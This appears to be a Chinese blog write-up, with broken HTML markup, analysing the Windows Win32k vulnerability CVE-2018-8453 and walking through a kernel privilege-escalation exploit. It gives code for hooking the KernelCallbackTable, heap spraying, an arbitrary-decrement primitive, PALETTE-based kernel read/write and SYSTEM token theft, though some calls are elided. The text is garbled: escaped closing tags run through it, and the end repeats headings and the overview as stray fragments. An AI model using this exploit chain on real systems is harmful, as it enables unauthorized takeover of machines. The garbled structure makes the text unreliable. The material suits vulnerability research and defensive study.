CVE-2018-8453 Win32k漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2018-8453是一个Windows内核模式驱动win32kfull.sys中的Use-After-Free (UAF)类型漏洞。该漏洞允许攻击者在内核模式下执行任意代码，从而提升权限。<\/p>

漏洞成因<\/h3>
漏洞产生于`win32kfull!NtUserSetWindowFNID<\/code>函数在对窗口对象设置FNID时没有检查窗口对象是否已经被释放，导致可以对一个已经被释放的窗口设置新的FNID。通过利用这一缺陷，可以控制窗口对象销毁时在xxxFreeWindow<\/code>函数中回调fnDWORD<\/code>的hook函数，从而在win32kfull!xxxSBTrackInit<\/code>中实现对pSBTrack<\/code>的Double Free。<\/p>`

环境配置<\/h2>

操作系统：Windows 10 x64 1709版本<\/li>
调试工具：WinDbg Preview 1.0.2001.02001<\/li>
<\/ul>
漏洞分析<\/h2>
BSOD分析<\/h3>
当POC运行时，系统会因Double Free而崩溃。关键观察点：<\/p>

崩溃时系统试图释放一块已经释放的pool内存<\/li>
这是一个0x80大小的session pool<\/li>
调用栈显示win32kfull!xxxSBTrackInit<\/code>和win32kfull!xxxEndScroll<\/code>都尝试释放同一块内存<\/li>
<\/ol>
关键函数分析<\/h3>
win32kfull!xxxSBTrackInit<\/code><\/h4>
该函数实现滚动条的鼠标跟随功能，主要逻辑：<\/p>

分配SBTrack<\/code>结构体保存用户鼠标位置信息<\/li>
初始化SBTrack<\/code>结构<\/li>
进入xxxSBTrackLoop<\/code>循环处理用户消息<\/li>
循环结束后释放SBTrack<\/code>结构<\/li>
<\/ol>
pSBTrack =<\/span> (PSBTRACK)UserAllocPoolWithQuota(sizeof<\/span>(*<\/span>pSBTrack), TAG_SCROLLTRACK);
<\/span><\/span>if<\/span> (pSBTrack ==<\/span> NULL) return<\/span>;
<\/span><\/span>\/\/ 初始化pSBTrack
<\/span><\/span><\/span><\/span>xxxSBTrackLoop(pwnd, lParam, pSBCalc);
<\/span><\/span>\/\/ 循环结束后释放
<\/span><\/span><\/span><\/span>if<\/span> (pSBTrack) {
<\/span><\/span>    UserFreePool(pSBTrack);
<\/span><\/span>    PWNDTOPSBTRACK(pwnd) =<\/span> NULL;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>win32kfull!xxxEndScroll<\/code><\/h4>
该函数用于终止滚动条跟踪模式，会释放SBTrack<\/code>结构：<\/p>
void<\/span> xxxEndScroll<\/span>(PWND pwnd, BOOL fCancel) {
<\/span><\/span>    PSBTRACK pSBTrack =<\/span> PWNDTOPSBTRACK(pwnd);
<\/span><\/span>    if<\/span> (pSBTrack &&<\/span> PtiCurrent()-><\/span>pq-><\/span>spwndCapture ==<\/span> pwnd &&<\/span> pSBTrack-><\/span>xxxpfnSB !=<\/span> NULL) {
<\/span><\/span>        pSBTrack-><\/span>xxxpfnSB =<\/span> NULL;
<\/span><\/span>        UserFreePool(pSBTrack);
<\/span><\/span>        PWNDTOPSBTRACK(pwnd) =<\/span> NULL;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>调用路径<\/h4>
WM_CANCELMODE<\/code>消息触发路径：<\/p>
xxxDefWindowProc -> xxxDWP_DoCancelMode -> xxxEndScroll
<\/code><\/pre>
POC分析<\/h2>
窗口创建<\/h3>
UINT CreateWindows<\/span>(VOID) {
<\/span><\/span>    WNDCLASS wndclass =<\/span> {0<\/span>};
<\/span><\/span>    wndclass.cbWndExtra =<\/span> 0x08<\/span>;  \/\/ 关键设置
<\/span><\/span><\/span><\/span>    wndclass.lpszClassName =<\/span> "case"<\/span>;
<\/span><\/span>    RegisterClassA(&<\/span>wndclass);
<\/span><\/span>    
<\/span><\/span>    Window =<\/span> CreateWindowExA(0<\/span>, "case"<\/span>, NULL, WS_DISABLED, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
<\/span><\/span>    SetWindowLongA(Window, 0<\/span>, (ULONG)Window);  \/\/ 保存句柄在扩展内存
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ 创建子滚动条控件，必须设置为WS_CHILD
<\/span><\/span><\/span><\/span>    SrollBar =<\/span> CreateWindowExA(0<\/span>, "SCROLLBAR"<\/span>, NULL, WS_CHILD |<\/span> WS_VISIBLE |<\/span> SBS_HORZ, NULL, NULL, 2<\/span>, 2<\/span>, Window, NULL, hInstance, NULL);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点：<\/p>

cbWndExtra = 0x08<\/code>：为窗口设置扩展内存<\/li>
滚动条必须设置为WS_CHILD<\/code>：保持对父窗口的引用<\/li>
保存窗口句柄在扩展内存：后续用于识别<\/li>
<\/ul>
回调函数Hook<\/h3>
VOID Hook_Init<\/span>(VOID) {
<\/span><\/span>    ULONG64 KernelCallbackTable =<\/span> *<\/span>(ULONG64*<\/span>)(PEB +<\/span> 0x58<\/span>);
<\/span><\/span>    VirtualProtect((LPVOID)KernelCallbackTable, 0x1024<\/span>, PAGE_EXECUTE_READWRITE, &<\/span>OldType);
<\/span><\/span>    
<\/span><\/span>    \/\/ Hook fnDWORD
<\/span><\/span><\/span><\/span>    *<\/span>(ULONG64*<\/span>)(KernelCallbackTable +<\/span> 0x08<\/span> *<\/span> 0x02<\/span>) =<\/span> (ULONG64)fnDWORDHook;
<\/span><\/span>    
<\/span><\/span>    \/\/ Hook xxxClientAllocWindowClassExtraBytes
<\/span><\/span><\/span><\/span>    *<\/span>(ULONG64*<\/span>)(KernelCallbackTable +<\/span> 0x08<\/span> *<\/span> 0x7E<\/span>) =<\/span> (ULONG64)xxxClientAllocWindowClassExtraBytesHook;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>触发流程<\/h3>

发送WM_LBUTTONDOWN<\/code>消息给滚动条<\/li>
系统进入xxxSBTrackInit<\/code>和xxxSBTrackLoop<\/code><\/li>
在fnDWORDHook<\/code>回调中：

销毁父窗口<\/li>
触发xxxFreeWindow<\/code>调用xxxClientAllocWindowClassExtraBytesHook<\/code><\/li>
<\/ul>
<\/li>
在xxxClientAllocWindowClassExtraBytesHook<\/code>中：

创建新滚动条<\/li>
设置窗口FNID为0x2A1<\/li>
设置新滚动条的捕获<\/li>
<\/ul>
<\/li>
再次进入fnDWORDHook<\/code>时发送WM_CANCELMODE<\/code><\/li>
触发xxxEndScroll<\/code>释放pSBTrack<\/code><\/li>
xxxSBTrackInit<\/code>结束时再次释放pSBTrack<\/code>，导致Double Free<\/li>
<\/ol>
漏洞利用<\/h2>
利用思路<\/h3>

通过堆喷射控制释放后的pSBTrack<\/code>内存<\/li>
利用HMAssignmentUnlock<\/code>实现任意地址减1操作<\/li>
泄露PALETTE<\/code>结构地址<\/li>
修改PALETTE<\/code>结构实现任意内存读写<\/li>
修改进程token提权<\/li>
<\/ol>
关键步骤<\/h3>
1. 堆喷射控制内存<\/h4>
UCHAR MenuNames[0x100<\/span>] =<\/span> {0<\/span>};
<\/span><\/span>memset(MenuNames, 0x43<\/span>, 0x80<\/span> -<\/span> 0x20<\/span>);
<\/span><\/span>*<\/span>(ULONG64*<\/span>)((ULONG64)MenuNames +<\/span> 0x10<\/span>) =<\/span> To_Where_A_Palette;
<\/span><\/span>*<\/span>(ULONG64*<\/span>)((ULONG64)MenuNames +<\/span> 0x08<\/span>) =<\/span> To_Where_A_Palette;
<\/span><\/span>
<\/span><\/span>\/\/ 注册大量窗口类占用释放的内存
<\/span><\/span><\/span><\/span>for<\/span> (UINT I =<\/span> 0<\/span>; I <<\/span> 0x1000<\/span>; ++<\/span>I) {
<\/span><\/span>    sprintf((char<\/span>*<\/span>)ClassName, "WindowUaf%d"<\/span>, I);
<\/span><\/span>    wndclass.lpszMenuName =<\/span> (LPCWSTR)MenuNames;
<\/span><\/span>    wndclass.lpszClassName =<\/span> (LPCWSTR)ClassName;
<\/span><\/span>    RegisterClassW(&<\/span>wndclass);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 任意地址减1<\/h4>
HMAssignmentUnlock<\/code>函数实现：<\/p>
mov<\/span>     rax<\/span>, [rcx<\/span>+<\/span>8<\/span>]
<\/span><\/span>dec<\/span>     qword<\/span> ptr<\/span> [rax<\/span>]
<\/span><\/span><\/code><\/pre>通过控制rcx<\/code>指向的内存内容，可以实现任意地址减1。<\/p>
3. 泄露PALETTE地址<\/h4>
ULONG64 GetMenuAddress<\/span>() {
<\/span><\/span>    \/\/ 创建临时窗口获取tagCLS地址
<\/span><\/span><\/span><\/span>    hwnd =<\/span> CreateWindowExW(0<\/span>, L<\/span>"LEAKWS"<\/span>, NULL, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, NULL, NULL, GetModuleHandleA(0<\/span>), NULL);
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取tagWND用户态地址
<\/span><\/span><\/span><\/span>    PTagWnd =<\/span> (ULONG64)HMValidateHandle(hwnd, 0x01<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 计算tagCLS地址
<\/span><\/span><\/span><\/span>    UlClientDelta =<\/span> (ULONG64)((*<\/span>(ULONG64*<\/span>)(PTagWnd +<\/span> 0x20<\/span>)) -<\/span> (ULONG64)PTagWnd);
<\/span><\/span>    TagCls =<\/span> (*<\/span>(ULONG64*<\/span>)(PTagWnd +<\/span> 0xa8<\/span>)) -<\/span> UlClientDelta;
<\/span><\/span>    
<\/span><\/span>    DestroyWindow(hwnd);
<\/span><\/span>    return<\/span> *<\/span>(ULONG64*<\/span>)(TagCls +<\/span> 0x98<\/span>);  \/\/ 获取MenuName地址
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 修改PALETTE结构<\/h4>
\/\/ 创建特殊PALETTE结构
<\/span><\/span><\/span><\/span>Palette =<\/span> (LOGPALETTE*<\/span>)malloc(sizeof<\/span>(LOGPALETTE) +<\/span> (sizeof<\/span>(PALETTEENTRY) *<\/span> (0x1D5<\/span> -<\/span> 0x01<\/span>)));
<\/span><\/span>Palette-><\/span>palVersion =<\/span> 0x0300<\/span>;
<\/span><\/span>Palette-><\/span>palNumEntries =<\/span> 0x1D5<\/span>;  \/\/ 分配0x800大小的pool
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 创建大量PALETTE对象占用内存
<\/span><\/span><\/span><\/span>for<\/span> (UINT I =<\/span> 0<\/span>; I <<\/span> 0x1500<\/span>; ++<\/span>I) {
<\/span><\/span>    CreatePalette(Palette);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 获取目标PALETTE对象
<\/span><\/span><\/span><\/span>Where_PALETTE =<\/span> CreatePalette(Palette);
<\/span><\/span>What_PALETTE =<\/span> CreatePalette(Palette);
<\/span><\/span><\/code><\/pre>5. 实现任意读写<\/h4>
通过修改PALETTE<\/code>结构的cEntries<\/code>和pFirstColor<\/code>：<\/p>
\/\/ 扩大读写范围
<\/span><\/span><\/span><\/span>SetPaletteEntries(Where_PALETTE, ...);
<\/span><\/span>
<\/span><\/span>\/\/ 任意地址读写
<\/span><\/span><\/span><\/span>SetPaletteEntries(What_PALETTE, ...);
<\/span><\/span>GetPaletteEntries(What_PALETTE, ...);
<\/span><\/span><\/code><\/pre>6. 提权<\/h4>
修改当前进程的token权限：<\/p>
\/\/ 获取当前进程token
<\/span><\/span><\/span><\/span>ULONG64 CurrentProcess =<\/span> GetCurrentProcessToken();
<\/span><\/span>ULONG64 SystemProcess =<\/span> GetSystemProcessToken();
<\/span><\/span>
<\/span><\/span>\/\/ 复制SYSTEM token到当前进程
<\/span><\/span><\/span><\/span>SetPaletteEntries(Where_PALETTE, ...);
<\/span><\/span><\/code><\/pre>清理工作<\/h3>
为避免Double Free导致系统不稳定，需要清理对pSBTrack<\/code>的引用：<\/p>
VOID FMenuName<\/span>(VOID) {
<\/span><\/span>    ULONG64 Zero =<\/span> 0<\/span>;
<\/span><\/span>    for<\/span> (UINT I =<\/span> 0<\/span>; I <<\/span> 0x1000<\/span>; ++<\/span>I) {
<\/span><\/span>        if<\/span> (TagCls_Menu_Address[I] ==<\/span> 0<\/span>) continue<\/span>;
<\/span><\/span>        
<\/span><\/span>        \/\/ 将lpszMenuName指针置零
<\/span><\/span><\/span><\/span>        SetPaletteEntries(Where_PALETTE, 0x1DE<\/span> +<\/span> 0x1E<\/span>, 2<\/span>, (LPPALETTEENTRY)&<\/span>Menu);
<\/span><\/span>        SetPaletteEntries(What_PALETTE, 0<\/span>, 2<\/span>, (LPPALETTEENTRY)&<\/span>Zero);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>
CVE-2018-8453是一个典型的UAF漏洞，通过精心构造的窗口操作和回调函数hook，攻击者可以实现内核内存的任意读写，最终达到提权目的。该漏洞利用涉及多个关键技术点：<\/p>

窗口对象和FNID的巧妙操作<\/li>
回调函数hook技术<\/li>
精确的堆布局控制<\/li>
PALETTE结构的利用<\/li>
任意地址读写实现<\/li>
<\/ol>
微软在后续版本中修复了该漏洞，主要修复点包括对窗口对象状态的严格检查以及改进的内存管理机制。<\/p>

CVE-2018-8453 Win32k漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2018-8453是一个Windows内核模式驱动win32kfull.sys中的Use-After-Free (UAF)类型漏洞。该漏洞允许攻击者在内核模式下执行任意代码，从而提升权限。<\/p>

漏洞分析<\/h2>

关键函数分析<\/h3>

POC分析<\/h2>

漏洞利用<\/h2>

关键步骤<\/h3>

漏洞概述<\/h2>
CVE-2018-8453是一个Windows内核模式驱动win32kfull.sys中的Use-After-Free (UAF)类型漏洞。该漏洞允许攻击者在内核模式下执行任意代码，从而提升权限。<\/p>